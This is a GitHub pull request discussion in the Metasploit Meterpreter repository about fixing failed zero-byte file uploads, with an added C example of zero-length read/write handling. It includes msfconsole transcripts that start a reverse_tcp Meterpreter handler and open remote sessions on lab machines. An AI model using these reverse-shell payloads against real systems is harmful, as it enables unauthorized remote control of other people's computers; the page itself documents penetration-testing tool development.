rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

handle zero-byte reads and writes gracefully #117

Closed bcook-r7 closed 9 years ago

bcook-r7 commented 9 years ago

When writing to a file channel, it is possible to open a file and have an implicit 0-byte write. For instance, when opening an empty file, like so:

  ::File.open(local_file_name, "")

or 'touching' a file as in write_file("meterpreter-test", "") in test/modules/post/test/file.rb or uploading a zero-length file.

Steps to reproduce/verify

Before:

$ touch hello
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (787456 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:55621) at 2015-01-27 11:23:09 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[-] core_channel_write: Operation failed: The parameter is incorrect.

After:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(handler) > run

[*] Started reverse handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.10:49833) at 2015-01-27 11:26:03 -0600

meterpreter > upload hello
[*] uploading  : hello -> hello
[*] uploaded   : hello -> hello
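The failure in the transcript ("The parameter is incorrect." is Windows' text for ERROR_INVALID_PARAMETER) is the general zero-length I/O edge case: a write routine that treats a return value of 0 as an error cannot tell an empty request from a failed one. The following is an added example written for this page, not code from rapid7/meterpreter or from this PR; it uses portable stdio and a temp file instead of the Win32 file API, and the CH_* status codes and all function names are hypothetical. It puts the naive check beside the corrected one and shows the matching rule for reads, where a zero return means EOF only if more than zero bytes were requested:

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical status codes for this example; not Meterpreter's TLV result codes. */
enum { CH_OK = 0, CH_ERR_IO = 1 };

/*
 * Buggy shape: treats "zero bytes written" as failure. For a zero-length
 * request fwrite() legitimately returns 0, so uploading an empty file
 * is reported as an error even though nothing went wrong.
 */
static int channel_write_naive(FILE *fd, const void *buf, size_t len)
{
    size_t written = fwrite(buf, 1, len, fd);
    if (written == 0) {
        return CH_ERR_IO;        /* wrong when len == 0 */
    }
    return CH_OK;
}

/*
 * Fixed shape: a zero-length write is a valid no-op (the file was already
 * created or truncated when the channel was opened), and success means
 * "every requested byte was written", not "more than zero bytes were".
 */
static int channel_write_fixed(FILE *fd, const void *buf, size_t len,
                               size_t *out_written)
{
    *out_written = 0;
    if (len == 0) {
        return CH_OK;
    }
    *out_written = fwrite(buf, 1, len, fd);
    return (*out_written == len) ? CH_OK : CH_ERR_IO;
}

/*
 * Read side of the same rule: a short or zero return from fread() is EOF
 * only if the caller asked for more than zero bytes and no error is set.
 */
static int channel_read_fixed(FILE *fd, void *buf, size_t len,
                              size_t *out_read, int *eof)
{
    *out_read = 0;
    *eof = 0;
    if (len == 0) {
        return CH_OK;            /* nothing requested, nothing to report */
    }
    *out_read = fread(buf, 1, len, fd);
    if (*out_read < len) {
        if (ferror(fd)) {
            return CH_ERR_IO;
        }
        if (feof(fd)) {
            *eof = 1;
        }
    }
    return CH_OK;
}

/* Returns 1 if the naive writer rejects an empty upload, 0 if it accepts it,
 * -1 if the temp file could not be created. */
int naive_rejects_empty_write(void)
{
    FILE *fd = tmpfile();
    if (!fd) return -1;
    int rc = channel_write_naive(fd, "", 0);
    fclose(fd);
    return rc == CH_ERR_IO;
}

/*
 * Simulates an upload: writes len bytes of data into a fresh temp file with
 * the fixed writer, reads it back with the fixed reader, and returns the
 * number of bytes read back (0 for an empty file), or -1 on any failure.
 */
long roundtrip_fixed(const char *data, size_t len)
{
    char buf[256];
    size_t written = 0, got = 0;
    int eof = 0;
    if (len > sizeof buf) return -1;
    FILE *fd = tmpfile();
    if (!fd) return -1;
    if (channel_write_fixed(fd, data, len, &written) != CH_OK) { fclose(fd); return -1; }
    fflush(fd);
    rewind(fd);
    if (channel_read_fixed(fd, buf, sizeof buf, &got, &eof) != CH_OK) { fclose(fd); return -1; }
    fclose(fd);
    if (got != len || memcmp(buf, data, len) != 0) return -1;
    return (long)got;
}

int main(void)
{
    /* Constructed inputs: an empty file (the PR's `touch hello` case) and a 5-byte file. */
    printf("naive writer rejects empty upload: %d\n", naive_rejects_empty_write());
    printf("fixed round-trip of empty file: %ld bytes\n", roundtrip_fixed("", 0));
    printf("fixed round-trip of 'hello': %ld bytes\n", roundtrip_fixed("hello", 5));
    return 0;
}
```

The design point is to compare the bytes written against the bytes requested and to short-circuit a zero-length request before touching the underlying I/O call, so that `touch`-style uploads and explicit empty writes succeed on every platform regardless of how the native write call reports a zero-byte request.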

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/141/

OJ commented 9 years ago

Processing shortly!

OJ commented 9 years ago

Before

Windows x86

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.42
[*] Meterpreter session 18 opened (10.1.10.40:8000 -> 10.1.10.42:59130) at 2015-01-28 15:08:54 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[-] core_channel_write: Operation failed: The parameter is incorrect.

Broken!

Windows x64

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 10.1.10.42
[*] Meterpreter session 19 opened (10.1.10.40:8000 -> 10.1.10.42:59134) at 2015-01-28 15:11:35 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[-] core_channel_write: Operation failed: The parameter is incorrect.

Broken

Linux

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 10.1.10.40
[*] Meterpreter session 20 opened (10.1.10.40:8000 -> 10.1.10.40:54001) at 2015-01-28 15:13:20 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.14.23-100.fc19.x86_64 #1 SMP Thu Oct 30 18:36:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > upload /tmp/empty /home/oj/empty
[*] uploading  : /tmp/empty -> /home/oj/empty
[*] uploaded   : /tmp/empty -> /home/oj/empty

working

OJ commented 9 years ago

After

Windows x86

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.42
[*] Meterpreter session 21 opened (10.1.10.40:8000 -> 10.1.10.42:59251) at 2015-01-28 19:41:56 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[*] uploaded   : /tmp/empty -> C:\temp\\empty

Working!

Windows x64

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 10.1.10.42
[*] Meterpreter session 22 opened (10.1.10.40:8000 -> 10.1.10.42:59252) at 2015-01-28 19:43:10 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > upload /tmp/empty C:\\temp\\
[*] uploading  : /tmp/empty -> C:\temp\
[*] uploaded   : /tmp/empty -> C:\temp\\empty

Working!

Linux

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 10.1.10.40
[*] Meterpreter session 23 opened (10.1.10.40:8000 -> 10.1.10.40:55237) at 2015-01-28 19:46:41 +1000

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux ropchain 3.14.23-100.fc19.x86_64 #1 SMP Thu Oct 30 18:36:00 UTC 2014 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > upload /tmp/empty /home/oj/empty
[*] uploading  : /tmp/empty -> /home/oj/empty
[*] uploaded   : /tmp/empty -> /home/oj/empty

Still working.

Looks good to me. Landing.

OJ commented 9 years ago

Is it worth doing another build and release of the binaries at this point? Or should we wait for more stuff ?

bcook-r7 commented 9 years ago

Let's wait a little while - working on more stuff in the mean time.